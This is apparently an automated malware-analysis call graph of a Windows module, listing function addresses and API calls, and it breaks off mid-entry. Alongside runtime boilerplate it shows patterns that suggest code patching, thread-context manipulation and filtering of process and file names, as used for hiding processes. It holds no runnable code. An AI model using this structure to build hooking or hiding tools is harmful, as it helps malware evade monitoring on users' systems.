7877->7878 7883 2bcd7e3c5df __std_exception_copy 7877->7883 7879 2bcd7e3d1f4 __std_exception_copy 13 API calls 7878->7879 7881 2bcd7e3c619 7879->7881 7880 2bcd7e3c602 HeapAlloc 7880->7881 7880->7883 7881->7843 7881->7845 7882 2bcd7e3b470 __std_exception_copy 2 API calls 7882->7883 7883->7878 7883->7880 7883->7882 7885 2bcd7e3e22c 16 API calls 7884->7885 7886 2bcd7e3e91b 7885->7886 7887 2bcd7e3ea71 7886->7887 7889 2bcd7e3e958 IsValidCodePage 7886->7889 7894 2bcd7e3e972 7886->7894 7888 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 7887->7888 7890 2bcd7e3e6a9 7888->7890 7889->7887 7891 2bcd7e3e969 7889->7891 7890->7848 7890->7853 7892 2bcd7e3e998 GetCPInfo 7891->7892 7891->7894 7892->7887 7892->7894 7927 2bcd7e3e344 7894->7927 8025 2bcd7e3c558 EnterCriticalSection 7895->8025 7912 2bcd7e3dd9c 7911->7912 7913 2bcd7e3dd97 7911->7913 7912->7913 7914 2bcd7e3cab0 _invalid_parameter_noinfo 14 API calls 7912->7914 7913->7873 7913->7874 7915 2bcd7e3ddb7 7914->7915 7919 2bcd7e3ffb4 7915->7919 7920 2bcd7e3ddda 7919->7920 7921 2bcd7e3ffc9 7919->7921 7923 2bcd7e40020 7920->7923 7921->7920 7922 2bcd7e40a40 _invalid_parameter_noinfo 14 API calls 7921->7922 7922->7920 7924 2bcd7e40048 7923->7924 7925 2bcd7e40035 7923->7925 7924->7913 7925->7924 7926 2bcd7e3e8c4 _invalid_parameter_noinfo 14 API calls 7925->7926 7926->7924 7928 2bcd7e3e38f GetCPInfo 7927->7928 7929 2bcd7e3e485 7927->7929 7928->7929 7934 2bcd7e3e3a2 7928->7934 7930 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 7929->7930 7931 2bcd7e3e524 7930->7931 7931->7887 7938 2bcd7e41474 7934->7938 7939 2bcd7e3dd78 14 API calls 7938->7939 7940 2bcd7e414b6 7939->7940 7958 2bcd7e3ec58 7940->7958 7959 2bcd7e3ec61 MultiByteToWideChar 7958->7959 8027 2bcd7e3bec1 8026->8027 8028 2bcd7e3be9a 8026->8028 8029 2bcd7e3beea 8027->8029 8030 2bcd7e3d2a0 __free_lconv_num 13 API calls 8027->8030 8028->7825 8031 2bcd7e3d2a0 __free_lconv_num 13 API calls 8029->8031 8030->8027 8031->8028 8413 2bcd7e334b8 8415 2bcd7e334e8 8413->8415 8414 2bcd7e335a1 8415->8414 8416 2bcd7e33505 PdhGetCounterInfoW 8415->8416 8416->8414 8417 2bcd7e33523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8416->8417 8418 2bcd7e3358d GetProcessHeap HeapFree 8417->8418 8419 2bcd7e33555 StrCmpW 8417->8419 8418->8414 8419->8418 8421 2bcd7e3356a 8419->8421 8421->8418 8422 2bcd7e33950 StrCmpNW 8421->8422 8423 2bcd7e33982 StrStrW 8422->8423 8426 2bcd7e339f2 8422->8426 8424 2bcd7e3399b StrToIntW 8423->8424 8423->8426 8425 2bcd7e339c3 8424->8425 8424->8426 8425->8426 8432 2bcd7e31a30 OpenProcess 8425->8432 8426->8421 8429 2bcd7e33f88 StrCmpNIW 8430 2bcd7e339e4 8429->8430 8430->8426 8431 2bcd7e31cfc 2 API calls 8430->8431 8431->8426 8433 2bcd7e31ab6 8432->8433 8434 2bcd7e31a64 K32GetModuleFileNameExW 8432->8434 8433->8426 8433->8429 8435 2bcd7e31a7e PathFindFileNameW lstrlenW 8434->8435 8436 2bcd7e31aad CloseHandle 8434->8436 8435->8436 8437 2bcd7e31a9c StrCpyW 8435->8437 8436->8433 8437->8436 8032 2bcd7e3b500 8037 2bcd7e3c558 EnterCriticalSection 8032->8037 9179 2bcd7e3c180 9182 2bcd7e3bf38 9179->9182 9189 2bcd7e3bf00 9182->9189 9187 2bcd7e3bebc 13 API calls 9188 2bcd7e3bf6b 9187->9188 9190 2bcd7e3bf10 9189->9190 9191 2bcd7e3bf15 9189->9191 9192 2bcd7e3bebc 13 API calls 9190->9192 9193 2bcd7e3bf1c 9191->9193 9192->9191 9194 2bcd7e3bf31 9193->9194 9195 2bcd7e3bf2c 9193->9195 9194->9187 9196 2bcd7e3bebc 13 API calls 9195->9196 9196->9194 8438 2bcd7e4387c 8440 2bcd7e438b4 __GSHandlerCheckCommon 8438->8440 8439 2bcd7e438e0 8440->8439 8442 2bcd7e39a24 8440->8442 8443 2bcd7e39324 _CreateFrameInfo 9 API calls 8442->8443 8444 2bcd7e39a4e 8443->8444 8445 2bcd7e39324 _CreateFrameInfo 9 API calls 8444->8445 8446 2bcd7e39a5b 8445->8446 8447 2bcd7e39324 _CreateFrameInfo 9 API calls 8446->8447 8448 2bcd7e39a64 8447->8448 8448->8439 8905 2bcd7e3cbfc 8910 2bcd7e3f3a0 8905->8910 8907 2bcd7e3cc05 8908 2bcd7e3cb10 __std_exception_copy 13 API calls 8907->8908 8909 2bcd7e3cc22 __vcrt_uninitialize_ptd 8907->8909 8908->8909 8911 2bcd7e3f3b5 8910->8911 8912 2bcd7e3f3b1 8910->8912 8911->8912 8913 2bcd7e3ef88 9 API calls 8911->8913 8912->8907 8913->8912 8038 2bcd7e32300 8039 2bcd7e32331 8038->8039 8040 2bcd7e32412 8039->8040 8041 2bcd7e32447 8039->8041 8047 2bcd7e32355 8039->8047 8042 2bcd7e3244c 8041->8042 8043 2bcd7e324bb 8041->8043 8055 2bcd7e335c8 GetProcessHeap HeapAlloc 8042->8055 8043->8040 8046 2bcd7e335c8 11 API calls 8043->8046 8045 2bcd7e3238d StrCmpNIW 8045->8047 8046->8040 8047->8040 8047->8045 8049 2bcd7e31d30 8047->8049 8050 2bcd7e31d57 GetProcessHeap HeapAlloc 8049->8050 8051 2bcd7e31db4 8049->8051 8050->8051 8052 2bcd7e31d92 8050->8052 8051->8047 8061 2bcd7e31cfc 8052->8061 8058 2bcd7e3361b 8055->8058 8056 2bcd7e336d9 GetProcessHeap HeapFree 8056->8040 8057 2bcd7e336d4 8057->8056 8058->8056 8058->8057 8059 2bcd7e33666 StrCmpNIW 8058->8059 8060 2bcd7e31d30 6 API calls 8058->8060 8059->8058 8060->8058 8062 2bcd7e31d13 8061->8062 8063 2bcd7e31d1c GetProcessHeap HeapFree 8061->8063 8064 2bcd7e31530 2 API calls 8062->8064 8063->8051 8064->8063 8449 2bcd7e32c80 TlsGetValue TlsGetValue TlsGetValue 8450 2bcd7e32cd9 8449->8450 8455 2bcd7e32d51 8449->8455 8453 2bcd7e32ce1 8450->8453 8450->8455 8451 2bcd7e32d4c 8452 2bcd7e32e06 TlsSetValue TlsSetValue TlsSetValue 8452->8451 8453->8451 8453->8452 8454 2bcd7e33f88 StrCmpNIW 8453->8454 8454->8453 8455->8451 8455->8452 8456 2bcd7e33f88 StrCmpNIW 8455->8456 8456->8455 8065 2bcd7e3c510 8066 2bcd7e3c518 8065->8066 8067 2bcd7e3c545 8066->8067 8069 2bcd7e3c574 8066->8069 8070 2bcd7e3c59f 8069->8070 8071 2bcd7e3c582 DeleteCriticalSection 8070->8071 8072 2bcd7e3c5a3 8070->8072 8071->8070 8072->8067 8914 2bcd7e44611 __scrt_dllmain_exception_filter 8457 2bcd7e35c8d 8459 2bcd7e35c94 8457->8459 8458 2bcd7e35cfb 8459->8458 8460 2bcd7e35d77 VirtualProtect 8459->8460 8461 2bcd7e35da3 GetLastError 8460->8461 8462 2bcd7e35db1 8460->8462 8461->8462 8073 2bcd7e38f0c 8080 2bcd7e3946c 8073->8080 8076 2bcd7e38f19 8081 2bcd7e39474 8080->8081 8083 2bcd7e394a5 8081->8083 8084 2bcd7e38f15 8081->8084 8097 2bcd7e39d28 8081->8097 8085 2bcd7e394b4 __vcrt_uninitialize_locks DeleteCriticalSection 8083->8085 8084->8076 8086 2bcd7e39400 8084->8086 8085->8084 8111 2bcd7e39bfc 8086->8111 8102 2bcd7e39aac 8097->8102 8100 2bcd7e39d73 InitializeCriticalSectionAndSpinCount 8101 2bcd7e39d68 8100->8101 8101->8081 8103 2bcd7e39b96 8102->8103 8109 2bcd7e39af0 __vcrt_InitializeCriticalSectionEx 8102->8109 8103->8100 8103->8101 8104 2bcd7e39b1e LoadLibraryExW 8106 2bcd7e39b3f GetLastError 8104->8106 8107 2bcd7e39bbd 8104->8107 8105 2bcd7e39bdd GetProcAddress 8105->8103 8106->8109 8107->8105 8108 2bcd7e39bd4 FreeLibrary 8107->8108 8108->8105 8109->8103 8109->8104 8109->8105 8110 2bcd7e39b61 LoadLibraryExW 8109->8110 8110->8107 8110->8109 8112 2bcd7e39aac __vcrt_InitializeCriticalSectionEx 5 API calls 8111->8112 8113 2bcd7e39c21 TlsAlloc 8112->8113 8915 2bcd7e3820c 8922 2bcd7e38f34 8915->8922 8918 2bcd7e38219 8923 2bcd7e39340 _CreateFrameInfo 9 API calls 8922->8923 8924 2bcd7e38215 8923->8924 8924->8918 8925 2bcd7e3c288 8924->8925 8926 2bcd7e3cb10 __std_exception_copy 13 API calls 8925->8926 8927 2bcd7e38222 8926->8927 8927->8918 8928 2bcd7e38f48 8927->8928 8931 2bcd7e392dc 8928->8931 8930 2bcd7e38f51 8930->8918 8932 2bcd7e392ed 8931->8932 8936 2bcd7e39302 8931->8936 8933 2bcd7e39c8c _CreateFrameInfo 6 API calls 8932->8933 8934 2bcd7e392f2 8933->8934 8937 2bcd7e39cd4 8934->8937 8936->8930 8938 2bcd7e39aac __vcrt_InitializeCriticalSectionEx 5 API calls 8937->8938 8939 2bcd7e39d02 8938->8939 8940 2bcd7e39d0c 8939->8940 8941 2bcd7e39d14 TlsSetValue 8939->8941 8940->8936 8941->8940 8942 2bcd7e3c218 8943 2bcd7e3d2a0 __free_lconv_num 13 API calls 8942->8943 8944 2bcd7e3c228 8943->8944 8945 2bcd7e3d2a0 __free_lconv_num 13 API calls 8944->8945 8946 2bcd7e3c23c 8945->8946 8947 2bcd7e3d2a0 __free_lconv_num 13 API calls 8946->8947 8948 2bcd7e3c250 8947->8948 8949 2bcd7e3d2a0 __free_lconv_num 13 API calls 8948->8949 8950 2bcd7e3c264 8949->8950 9197 2bcd7e41398 9198 2bcd7e413ae 9197->9198 9199 2bcd7e413f5 9198->9199 9201 2bcd7e4140e 9198->9201 9200 2bcd7e3d1f4 __std_exception_copy 13 API calls 9199->9200 9202 2bcd7e413fa 9200->9202 9203 2bcd7e41405 9201->9203 9205 2bcd7e3dd78 14 API calls 9201->9205 9204 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 9202->9204 9204->9203 9205->9203 8115 2bcd7e32518 GetProcessIdOfThread GetCurrentProcessId 8116 2bcd7e325be 8115->8116 8117 2bcd7e32543 CreateFileW 8115->8117 8117->8116 8118 2bcd7e32577 WriteFile ReadFile CloseHandle 8117->8118 8118->8116 8119 2bcd7e406e0 8120 2bcd7e406e9 8119->8120 8122 2bcd7e406f9 8119->8122 8121 2bcd7e3d1f4 __std_exception_copy 13 API calls 8120->8121 8123 2bcd7e406ee 8121->8123 8124 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8123->8124 8124->8122 9206 2bcd7e43960 9216 2bcd7e38ca0 9206->9216 9208 2bcd7e43988 9210 2bcd7e39324 _CreateFrameInfo 9 API calls 9211 2bcd7e43998 9210->9211 9212 2bcd7e39324 _CreateFrameInfo 9 API calls 9211->9212 9213 2bcd7e439a1 9212->9213 9214 2bcd7e3c2f4 14 API calls 9213->9214 9215 2bcd7e439aa 9214->9215 9218 2bcd7e38cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9216->9218 9217 2bcd7e38dd1 9217->9208 9217->9210 9218->9217 9219 2bcd7e38d94 RtlUnwindEx 9218->9219 9219->9218 8951 2bcd7e325dc 8953 2bcd7e3265a 8951->8953 8952 2bcd7e32777 8953->8952 8954 2bcd7e326bf GetFileType 8953->8954 8955 2bcd7e326cd StrCpyW 8954->8955 8956 2bcd7e326e1 8954->8956 8960 2bcd7e326ee 8955->8960 8962 2bcd7e31ad4 GetFinalPathNameByHandleW 8956->8962 8958 2bcd7e33f88 StrCmpNIW 8958->8960 8960->8952 8960->8958 8967 2bcd7e33708 StrCmpIW 8960->8967 8971 2bcd7e31dd4 8960->8971 8963 2bcd7e31afe StrCmpNIW 8962->8963 8964 2bcd7e31b3d 8962->8964 8963->8964 8965 2bcd7e31b18 lstrlenW 8963->8965 8964->8960 8965->8964 8966 2bcd7e31b2a StrCpyW 8965->8966 8966->8964 8968 2bcd7e33751 PathCombineW 8967->8968 8969 2bcd7e3373a StrCpyW StrCatW 8967->8969 8970 2bcd7e3375a 8968->8970 8969->8970 8970->8960 8972 2bcd7e31df4 8971->8972 8973 2bcd7e31deb 8971->8973 8972->8960 8974 2bcd7e31530 2 API calls 8973->8974 8974->8972 8125 2bcd7e3f6dc 8126 2bcd7e3f6e8 8125->8126 8128 2bcd7e3f70f 8126->8128 8129 2bcd7e41c0c 8126->8129 8130 2bcd7e41c11 8129->8130 8131 2bcd7e41c4c 8129->8131 8132 2bcd7e41c32 DeleteCriticalSection 8130->8132 8133 2bcd7e41c44 8130->8133 8131->8126 8132->8132 8132->8133 8134 2bcd7e3d2a0 __free_lconv_num 13 API calls 8133->8134 8134->8131 8975 2bcd7e363e3 8976 2bcd7e363f0 8975->8976 8977 2bcd7e363fc GetThreadContext 8976->8977 8984 2bcd7e3655a 8976->8984 8978 2bcd7e36422 8977->8978 8977->8984 8983 2bcd7e36449 8978->8983 8978->8984 8979 2bcd7e3663e 8981 2bcd7e3665e 8979->8981 8986 2bcd7e34b20 VirtualFree 8979->8986 8980 2bcd7e36581 VirtualProtect FlushInstructionCache 8980->8984 8982 2bcd7e35530 3 API calls 8981->8982 8990 2bcd7e36663 8982->8990 8985 2bcd7e364cd 8983->8985 8987 2bcd7e364a6 SetThreadContext 8983->8987 8984->8979 8984->8980 8986->8981 8987->8985 8988 2bcd7e366b7 8991 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 8988->8991 8989 2bcd7e36677 ResumeThread 8989->8990 8990->8988 8990->8989 8992 2bcd7e366ff 8991->8992 8463 2bcd7e4485e 8464 2bcd7e39324 _CreateFrameInfo 9 API calls 8463->8464 8465 2bcd7e4486c 8464->8465 8466 2bcd7e44877 8465->8466 8467 2bcd7e39324 _CreateFrameInfo 9 API calls 8465->8467 8467->8466 8468 2bcd7e4465f 8469 2bcd7e44677 8468->8469 8475 2bcd7e446e2 8468->8475 8470 2bcd7e39324 _CreateFrameInfo 9 API calls 8469->8470 8469->8475 8471 2bcd7e446c4 8470->8471 8472 2bcd7e39324 _CreateFrameInfo 9 API calls 8471->8472 8473 2bcd7e446d9 8472->8473 8474 2bcd7e3c2f4 14 API calls 8473->8474 8474->8475 9220 2bcd7e37f60 9221 2bcd7e37f7c 9220->9221 9222 2bcd7e37f81 9220->9222 9224 2bcd7e38090 9221->9224 9225 2bcd7e380b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9224->9225 9226 2bcd7e38127 9224->9226 9225->9226 9226->9222 8993 2bcd7e3b7ea 8994 2bcd7e3c2f4 14 API calls 8993->8994 8995 2bcd7e3b7ef 8994->8995 8996 2bcd7e3b85f 8995->8996 8997 2bcd7e3b815 GetModuleHandleW 8995->8997 9010 2bcd7e3b6f8 8996->9010 8997->8996 9001 2bcd7e3b822 8997->9001 9001->8996 9005 2bcd7e3b904 GetModuleHandleExW 9001->9005 9006 2bcd7e3b938 GetProcAddress 9005->9006 9007 2bcd7e3b94a 9005->9007 9006->9007 9008 2bcd7e3b962 9007->9008 9009 2bcd7e3b95b FreeLibrary 9007->9009 9008->8996 9009->9008 9022 2bcd7e3c558 EnterCriticalSection 9010->9022 9227 2bcd7e32f64 9229 2bcd7e32fc1 9227->9229 9228 2bcd7e32fdc 9229->9228 9230 2bcd7e338a8 3 API calls 9229->9230 9230->9228 9023 2bcd7e3f3e4 9024 2bcd7e3f41d 9023->9024 9026 2bcd7e3f3ee 9023->9026 9025 2bcd7e3f403 FreeLibrary 9025->9026 9026->9024 9026->9025 9027 2bcd7e433e4 9028 2bcd7e433fb 9027->9028 9029 2bcd7e433f5 CloseHandle 9027->9029 9029->9028 9030 2bcd7e327e8 9032 2bcd7e32867 9030->9032 9031 2bcd7e32998 9032->9031 9033 2bcd7e328c9 GetFileType 9032->9033 9034 2bcd7e328ed 9033->9034 9035 2bcd7e328d7 StrCpyW 9033->9035 9037 2bcd7e31ad4 4 API calls 9034->9037 9036 2bcd7e328fc 9035->9036 9040 2bcd7e3299d 9036->9040 9044 2bcd7e32906 9036->9044 9037->9036 9038 2bcd7e33f88 StrCmpNIW 9038->9040 9039 2bcd7e33f88 StrCmpNIW 9039->9044 9040->9031 9040->9038 9041 2bcd7e33708 4 API calls 9040->9041 9042 2bcd7e31dd4 2 API calls 9040->9042 9041->9040 9042->9040 9043 2bcd7e33708 4 API calls 9043->9044 9044->9031 9044->9039 9044->9043 9045 2bcd7e31dd4 2 API calls 9044->9045 9045->9044 8476 2bcd7e3f870 8477 2bcd7e3f8a0 8476->8477 8479 2bcd7e3f8c7 8476->8479 8478 2bcd7e3cb10 __std_exception_copy 13 API calls 8477->8478 8477->8479 8482 2bcd7e3f8b4 8477->8482 8478->8482 8480 2bcd7e3f99c 8479->8480 8499 2bcd7e3c558 EnterCriticalSection 8479->8499 8483 2bcd7e3fab3 8480->8483 8487 2bcd7e3f9ca 8480->8487 8497 2bcd7e3fa03 8480->8497 8482->8479 8484 2bcd7e3f949 8482->8484 8495 2bcd7e3f904 8482->8495 8489 2bcd7e3fac0 8483->8489 8501 2bcd7e3c5ac LeaveCriticalSection 8483->8501 8485 2bcd7e3d1f4 __std_exception_copy 13 API calls 8484->8485 8490 2bcd7e3f94e 8485->8490 8493 2bcd7e3cab0 _invalid_parameter_noinfo 14 API calls 8487->8493 8487->8497 8492 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 8490->8492 8491 2bcd7e3cab0 14 API calls _invalid_parameter_noinfo 8498 2bcd7e3fa61 8491->8498 8492->8495 8494 2bcd7e3f9f3 8493->8494 8496 2bcd7e3cab0 _invalid_parameter_noinfo 14 API calls 8494->8496 8496->8497 8497->8498 8500 2bcd7e3c5ac LeaveCriticalSection 8497->8500 8498->8491 9231 2bcd7e3f370 VirtualProtect 8502 2bcd7e38672 8503 2bcd7e390c0 __std_exception_copy 38 API calls 8502->8503 8504 2bcd7e3869d 8503->8504 9046 2bcd7e32ff0 9047 2bcd7e33061 9046->9047 9048 2bcd7e33384 9047->9048 9049 2bcd7e3308d GetModuleHandleA 9047->9049 9050 2bcd7e3309f GetProcAddress 9049->9050 9051 2bcd7e330b1 9049->9051 9050->9051 9051->9048 9052 2bcd7e330d8 StrCmpNIW 9051->9052 9052->9048 9058 2bcd7e330fd 9052->9058 9053 2bcd7e31a30 6 API calls 9053->9058 9054 2bcd7e3320f lstrlenW 9054->9058 9055 2bcd7e332b9 lstrlenW 9055->9058 9056 2bcd7e33f88 StrCmpNIW 9056->9058 9057 2bcd7e31cfc StrCmpIW StrCmpW 9057->9058 9058->9048 9058->9053 9058->9054 9058->9055 9058->9056 9058->9057 9232 2bcd7e35974 9233 2bcd7e3597a 9232->9233 9244 2bcd7e37fa0 9233->9244 9237 2bcd7e359de 9239 2bcd7e35a77 9239->9237 9241 2bcd7e35bfd 9239->9241 9257 2bcd7e37b80 9239->9257 9240 2bcd7e35cfb 9241->9240 9242 2bcd7e35d77 VirtualProtect 9241->9242 9242->9237 9243 2bcd7e35da3 GetLastError 9242->9243 9243->9237 9245 2bcd7e37fab 9244->9245 9246 2bcd7e359bd 9245->9246 9247 2bcd7e3b470 __std_exception_copy 2 API calls 9245->9247 9248 2bcd7e37fca 9245->9248 9246->9237 9253 2bcd7e34400 9246->9253 9247->9245 9249 2bcd7e37fd5 9248->9249 9263 2bcd7e387b8 9248->9263 9267 2bcd7e387d8 9249->9267 9254 2bcd7e3441d 9253->9254 9256 2bcd7e3448c 9254->9256 9271 2bcd7e34670 9254->9271 9256->9239 9258 2bcd7e37bc7 9257->9258 9296 2bcd7e37950 9258->9296 9261 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 9262 2bcd7e37bf1 9261->9262 9262->9239 9264 2bcd7e387c6 std::bad_alloc::bad_alloc 9263->9264 9265 2bcd7e39178 Concurrency::cancel_current_task 2 API calls 9264->9265 9266 2bcd7e387d7 9265->9266 9268 2bcd7e387e6 std::bad_alloc::bad_alloc 9267->9268 9269 2bcd7e39178 Concurrency::cancel_current_task 2 API calls 9268->9269 9270 2bcd7e37fdb 9269->9270 9272 2bcd7e34694 9271->9272 9274 2bcd7e346b7 9271->9274 9272->9274 9285 2bcd7e34120 9272->9285 9278 2bcd7e346ed 9274->9278 9291 2bcd7e34250 9274->9291 9275 2bcd7e3471d 9276 2bcd7e34753 9275->9276 9282 2bcd7e34120 3 API calls 9275->9282 9280 2bcd7e3476f 9276->9280 9283 2bcd7e34120 3 API calls 9276->9283 9278->9275 9279 2bcd7e34250 2 API calls 9278->9279 9279->9275 9281 2bcd7e3478b 9280->9281 9284 2bcd7e34250 2 API calls 9280->9284 9281->9256 9282->9276 9283->9280 9284->9281 9290 2bcd7e34141 9285->9290 9286 2bcd7e341b0 9286->9274 9287 2bcd7e34196 VirtualQuery 9287->9286 9287->9290 9288 2bcd7e341ca VirtualAlloc 9288->9286 9289 2bcd7e341fb GetLastError 9288->9289 9289->9290 9290->9286 9290->9287 9290->9288 9294 2bcd7e34268 9291->9294 9292 2bcd7e342d7 9292->9278 9293 2bcd7e342bd VirtualQuery 9293->9292 9293->9294 9294->9292 9294->9293 9295 2bcd7e34322 GetLastError 9294->9295 9295->9294 9297 2bcd7e3796b 9296->9297 9298 2bcd7e3798f 9297->9298 9299 2bcd7e37981 SetLastError 9297->9299 9298->9261 9299->9298 8138 2bcd7e446f5 8147 2bcd7e39324 8138->8147 8140 2bcd7e4470d 8141 2bcd7e39324 _CreateFrameInfo 9 API calls 8140->8141 8142 2bcd7e44728 8141->8142 8143 2bcd7e39324 _CreateFrameInfo 9 API calls 8142->8143 8144 2bcd7e4473c 8143->8144 8145 2bcd7e39324 _CreateFrameInfo 9 API calls 8144->8145 8146 2bcd7e4477e 8145->8146 8150 2bcd7e39340 8147->8150 8149 2bcd7e3932d 8149->8140 8151 2bcd7e3935f GetLastError 8150->8151 8152 2bcd7e39358 8150->8152 8162 2bcd7e39c8c 8151->8162 8152->8149 8163 2bcd7e39aac __vcrt_InitializeCriticalSectionEx 5 API calls 8162->8163 8164 2bcd7e39cb3 TlsGetValue 8163->8164 9059 2bcd7e341f9 9064 2bcd7e34146 9059->9064 9060 2bcd7e34196 VirtualQuery 9062 2bcd7e341b0 9060->9062 9060->9064 9061 2bcd7e341ca VirtualAlloc 9061->9062 9063 2bcd7e341fb GetLastError 9061->9063 9063->9064 9064->9060 9064->9061 9064->9062 9065 2bcd7e35ff9 9066 2bcd7e36000 VirtualProtect 9065->9066 9067 2bcd7e36029 GetLastError 9066->9067 9068 2bcd7e35f10 9066->9068 9067->9068 8505 2bcd7e3f440 GetProcessHeap 9300 2bcd7e3ff40 9301 2bcd7e3ff4b 9300->9301 9309 2bcd7e42c24 9301->9309 9322 2bcd7e3c558 EnterCriticalSection 9309->9322 8506 2bcd7e3ae42 8507 2bcd7e39324 _CreateFrameInfo 9 API calls 8506->8507 8509 2bcd7e3ae4f __CxxCallCatchBlock 8507->8509 8508 2bcd7e3ae93 RaiseException 8510 2bcd7e3aeba 8508->8510 8509->8508 8519 2bcd7e39978 8510->8519 8512 2bcd7e3aeeb __CxxCallCatchBlock 8513 2bcd7e39324 _CreateFrameInfo 9 API calls 8512->8513 8514 2bcd7e3aefe 8513->8514 8516 2bcd7e39324 _CreateFrameInfo 9 API calls 8514->8516 8518 2bcd7e3af07 8516->8518 8520 2bcd7e39324 _CreateFrameInfo 9 API calls 8519->8520 8521 2bcd7e3998a 8520->8521 8522 2bcd7e39324 _CreateFrameInfo 9 API calls 8521->8522 8523 2bcd7e399c5 8521->8523 8524 2bcd7e39995 8522->8524 8524->8523 8525 2bcd7e39324 _CreateFrameInfo 9 API calls 8524->8525 8526 2bcd7e399b6 8525->8526 8526->8512 8527 2bcd7e38ff8 8526->8527 8528 2bcd7e39324 _CreateFrameInfo 9 API calls 8527->8528 8529 2bcd7e39006 8528->8529 8529->8512 9069 2bcd7e447c2 9070 2bcd7e39978 __CxxCallCatchBlock 9 API calls 9069->9070 9074 2bcd7e447d5 9070->9074 9071 2bcd7e44814 __CxxCallCatchBlock 9072 2bcd7e39324 _CreateFrameInfo 9 API calls 9071->9072 9073 2bcd7e44828 9072->9073 9075 2bcd7e39324 _CreateFrameInfo 9 API calls 9073->9075 9074->9071 9077 2bcd7e38ff8 __CxxCallCatchBlock 9 API calls 9074->9077 9076 2bcd7e44838 9075->9076 9077->9071 7467 2bcd7e31e3c LoadLibraryA GetProcAddress 7468 2bcd7e31e6f 7467->7468 7469 2bcd7e31e62 SleepEx 7467->7469 7469->7469 9078 2bcd7e381c0 9079 2bcd7e381c9 __scrt_release_startup_lock 9078->9079 9081 2bcd7e381cd 9079->9081 9082 2bcd7e3bbb4 9079->9082 9083 2bcd7e3bbd4 9082->9083 9110 2bcd7e3bbed 9082->9110 9084 2bcd7e3bbf2 9083->9084 9085 2bcd7e3bbdc 9083->9085 9087 2bcd7e3e864 56 API calls 9084->9087 9086 2bcd7e3d1f4 __std_exception_copy 13 API calls 9085->9086 9088 2bcd7e3bbe1 9086->9088 9089 2bcd7e3bbf7 9087->9089 9091 2bcd7e3d04c _invalid_parameter_noinfo 38 API calls 9088->9091 9111 2bcd7e3df38 GetModuleFileNameW 9089->9111 9091->9110 9095 2bcd7e3bb54 13 API calls 9096 2bcd7e3bc61 9095->9096 9097 2bcd7e3bc69 9096->9097 9098 2bcd7e3bc7a 9096->9098 9099 2bcd7e3d1f4 __std_exception_copy 13 API calls 9097->9099 9100 2bcd7e3b994 14 API calls 9098->9100 9101 2bcd7e3bc6e 9099->9101 9102 2bcd7e3bc96 9100->9102 9103 2bcd7e3d2a0 __free_lconv_num 13 API calls 9101->9103 9102->9101 9104 2bcd7e3bcdf 9102->9104 9105 2bcd7e3bcc6 9102->9105 9103->9110 9108 2bcd7e3d2a0 __free_lconv_num 13 API calls 9104->9108 9106 2bcd7e3d2a0 __free_lconv_num 13 API calls 9105->9106 9107 2bcd7e3bccf 9106->9107 9109 2bcd7e3d2a0 __free_lconv_num 13 API calls 9107->9109 9108->9101 9109->9110 9110->9081 9112 2bcd7e3df91 9111->9112 9113 2bcd7e3df7d GetLastError 9111->9113 9115 2bcd7e3dd78 14 API calls 9112->9115 9114 2bcd7e3d184 13 API calls 9113->9114 9121 2bcd7e3df8a 9114->9121 9116 2bcd7e3dfbf 9115->9116 9117 2bcd7e3f198 9 API calls 9116->9117 9122 2bcd7e3dfd0 9116->9122 9117->9122 9118 2bcd7e38070 _invalid_parameter_noinfo 8 API calls 9120 2bcd7e3bc0e 9118->9120 9123 2bcd7e3b994 9120->9123 9121->9118 9129 2bcd7e3de1c 9122->9129 9125 2bcd7e3b9d2 9123->9125 9127 2bcd7e3ba38 9125->9127 9143 2bcd7e3ec1c 9125->9143 9126 2bcd7e3bb25 9126->9095 9127->9126 9128 2bcd7e3ec1c 14 API calls 9127->9128 9128->9127 9130 2bcd7e3de40 9129->9130 9131 2bcd7e3de5b 9129->9131 9130->9121 9132 2bcd7e3de60 9131->9132 9133 2bcd7e3ece8 WideCharToMultiByte 9131->9133 9132->9130 9135 2bcd7e3d1f4 __std_exception_copy 13 API calls 9132->9135 9134 2bcd7e3deb7 9133->9134 9134->9132 9136 2bcd7e3debe GetLastError 9134->9136 9137 2bcd7e3dee9 9134->9137 9135->9130 9138 2bcd7e3d184 13 API calls 9136->9138 9139 2bcd7e3ece8 WideCharToMultiByte 9137->9139 9140 2bcd7e3decb 9138->9140 9141 2bcd7e3df10 9139->9141 9142 2bcd7e3d1f4 __std_exception_copy 13 API calls 9140->9142 9141->9130 9141->9136 9142->9130 9144 2bcd7e3eba8 9143->9144 9145 2bcd7e3dd78 14 API calls 9144->9145 9146 2bcd7e3ebcc 9145->9146 9146->9125 8530 2bcd7e44848 8533 2bcd7e3904c 8530->8533 8534 2bcd7e39076 8533->8534 8535 2bcd7e39064 8533->8535 8536 2bcd7e39324 _CreateFrameInfo 9 API calls 8534->8536 8535->8534 8537 2bcd7e3906c 8535->8537 8538 2bcd7e3907b 8536->8538 8539 2bcd7e39074 8537->8539 8540 2bcd7e39324 _CreateFrameInfo 9 API calls 8537->8540 8538->8539 8541 2bcd7e39324 _CreateFrameInfo 9 API calls 8538->8541 8542 2bcd7e3909b 8540->8542 8541->8539 8543 2bcd7e39324 _CreateFrameInfo 9 API calls 8542->8543 8544 2bcd7e390a8 8543->8544 8545 2bcd7e3c2f4 14 API calls 8544->8545 8546 2bcd7e390b1 8545->8546 8547 2bcd7e3c2f4 14 API calls 8546->8547 8548 2bcd7e390bd 8547->8548 9323 2bcd7e3ad48 9324 2bcd7e39324 _CreateFrameInfo 9 API calls 9323->9324 9325 2bcd7e3ad7d 9324->9325 9326 2bcd7e39324 _CreateFrameInfo 9 API calls 9325->9326 9327 2bcd7e3ad8b __except_validate_context_record 9326->9327 9328 2bcd7e39324 _CreateFrameInfo 9 API calls 9327->9328 9329 2bcd7e3adcf 9328->9329 9330 2bcd7e39324 _CreateFrameInfo 9 API calls 9329->9330 9331 2bcd7e3add8 9330->9331 9332 2bcd7e39324 _CreateFrameInfo 9 API calls 9331->9332 9333 2bcd7e3ade1 9332->9333 9346 